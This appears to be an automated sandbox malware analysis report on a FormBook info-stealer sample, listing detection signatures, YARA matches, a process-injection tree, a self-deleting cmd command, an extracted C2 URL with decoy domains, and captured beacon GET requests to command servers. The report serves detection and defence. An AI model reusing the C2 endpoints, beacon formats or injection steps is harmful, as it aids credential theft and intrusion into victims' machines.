Loading ...

Play interactive tourEdit tour

Analysis Report 3.exe

Overview

General Information

Sample Name:3.exe
Analysis ID:433178
MD5:21f077fa0e739f6174e2452abc30bb7c
SHA1:9d60988db53eb662eb6a8e2f824036348f5e7ec0
SHA256:6f536ae781fd98358126408aa6991b4bb3ec3f9940929a22b25f785b71ec770d
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 3.exe (PID: 5636 cmdline: 'C:\Users\user\Desktop\3.exe' MD5: 21F077FA0E739F6174E2452ABC30BB7C)
    • 3.exe (PID: 4364 cmdline: C:\Users\user\Desktop\3.exe MD5: 21F077FA0E739F6174E2452ABC30BB7C)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 2172 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 4880 cmdline: /c del 'C:\Users\user\Desktop\3.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4628 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4912 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.glocp9.com/ogpo/"], "decoy": ["ctluxurypropinternational.com", "mortgagenewsdailt.com", "diegofragnaud.info", "marthapollackesq.com", "thirtynightstay.com", "sschospitalbardoli.com", "plaquitasparamascota.com", "keochatluong.com", "420rankings.com", "westwoodstorageco.com", "valdobbiadeneinlove.com", "the427group.com", "cartercavanaugh.com", "ivvitaminsofarizona.com", "ummemunira.com", "amplifierconsulting.net", "spk-sakuranomiya.com", "anjanaonline.com", "kalibriya.com", "baincot.com", "mcintire2020.com", "janbosun.com", "briankingfineart.com", "erictailey.com", "shwanfan.com", "secretpal.club", "heatingandairtulsa.com", "hungthinhrealfintechhub.net", "dawnlodge.com", "indyoutlaws.com", "capitalpipework.com", "ngancali.com", "beconnectedby.com", "lindsaysgill.com", "mykidscast.com", "nosequemierda.com", "lightinemporium.com", "18tshortstore.com", "blakedroberts.com", "atlaschatbot.com", "healthchu.com", "aersous.info", "hanoinews.site", "studiodates.com", "gzgzdcd.com", "beeta-company.com", "mu-rain.com", "apalstyle.com", "lezbyfriends.com", "beerundead.com", "superb-mushroomcoffee.fyi", "pennydamspickups.com", "haircutbytin.com", "fulmarsolutions.com", "guoteng66.com", "plastictohydrogen.com", "dingarage.com", "elyernoson03ak2.xyz", "hayatatateyama.com", "templatejar.com", "catherinelazure.com", "ayco.sucks", "vigipharx.com", "devastateclo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 23 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.0.3.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.0.3.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.0.3.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        1.2.3.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.3.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.glocp9.com/ogpo/"], "decoy": ["ctluxurypropinternational.com", "mortgagenewsdailt.com", "diegofragnaud.info", "marthapollackesq.com", "thirtynightstay.com", "sschospitalbardoli.com", "plaquitasparamascota.com", "keochatluong.com", "420rankings.com", "westwoodstorageco.com", "valdobbiadeneinlove.com", "the427group.com", "cartercavanaugh.com", "ivvitaminsofarizona.com", "ummemunira.com", "amplifierconsulting.net", "spk-sakuranomiya.com", "anjanaonline.com", "kalibriya.com", "baincot.com", "mcintire2020.com", "janbosun.com", "briankingfineart.com", "erictailey.com", "shwanfan.com", "secretpal.club", "heatingandairtulsa.com", "hungthinhrealfintechhub.net", "dawnlodge.com", "indyoutlaws.com", "capitalpipework.com", "ngancali.com", "beconnectedby.com", "lindsaysgill.com", "mykidscast.com", "nosequemierda.com", "lightinemporium.com", "18tshortstore.com", "blakedroberts.com", "atlaschatbot.com", "healthchu.com", "aersous.info", "hanoinews.site", "studiodates.com", "gzgzdcd.com", "beeta-company.com", "mu-rain.com", "apalstyle.com", "lezbyfriends.com", "beerundead.com", "superb-mushroomcoffee.fyi", "pennydamspickups.com", "haircutbytin.com", "fulmarsolutions.com", "guoteng66.com", "plastictohydrogen.com", "dingarage.com", "elyernoson03ak2.xyz", "hayatatateyama.com", "templatejar.com", "catherinelazure.com", "ayco.sucks", "vigipharx.com", "devastateclo.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 3.exeVirustotal: Detection: 58%Perma Link
          Source: 3.exeMetadefender: Detection: 42%Perma Link
          Source: 3.exeReversingLabs: Detection: 75%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.2.3.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49716 version: TLS 1.2
          Source: Binary string: ipconfig.pdb source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 3.exe, 00000001.00000003.242702997.0000000000750000.00000004.00000001.sdmp, ipconfig.exe, 00000013.00000002.468141767.0000000002C9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 3.exe, ipconfig.exe
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.glocp9.com/ogpo/
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 HTTP/1.1Host: www.cartercavanaugh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 HTTP/1.1Host: www.ayco.sucksConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 HTTP/1.1Host: www.vigipharx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 HTTP/1.1Host: www.plastictohydrogen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 HTTP/1.1Host: www.amplifierconsulting.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 HTTP/1.1Host: www.plaquitasparamascota.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 54.147.194.143 54.147.194.143
          Source: Joe Sandbox ViewIP Address: 81.17.18.198 81.17.18.198
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: PLI-ASCH PLI-ASCH
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 HTTP/1.1Host: www.cartercavanaugh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 HTTP/1.1Host: www.ayco.sucksConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 HTTP/1.1Host: www.vigipharx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 HTTP/1.1Host: www.plastictohydrogen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 HTTP/1.1Host: www.amplifierconsulting.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 HTTP/1.1Host: www.plaquitasparamascota.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Jun 2021 10:23:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.3.27Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=ab594f30faefbfad908548750f3c4e85; path=/Vary: HostData Raw: 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>404 Not Found</body></html>0
          Source: explorer.exe, 00000005.00000003.293007696.000000000F6C3000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49716 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_004181B0 NtCreateFile,1_2_004181B0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00418260 NtReadFile,1_2_00418260
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_004182E0 NtClose,1_2_004182E0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,1_2_00418390
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_004182DA NtClose,1_2_004182DA
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041838A NtAllocateVirtualMemory,1_2_0041838A
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AE98F0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AE9860
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9840 NtDelayExecution,LdrInitializeThunk,1_2_00AE9840
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE99A0 NtCreateSection,LdrInitializeThunk,1_2_00AE99A0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AE9910
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A20 NtResumeThread,LdrInitializeThunk,1_2_00AE9A20
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AE9A00
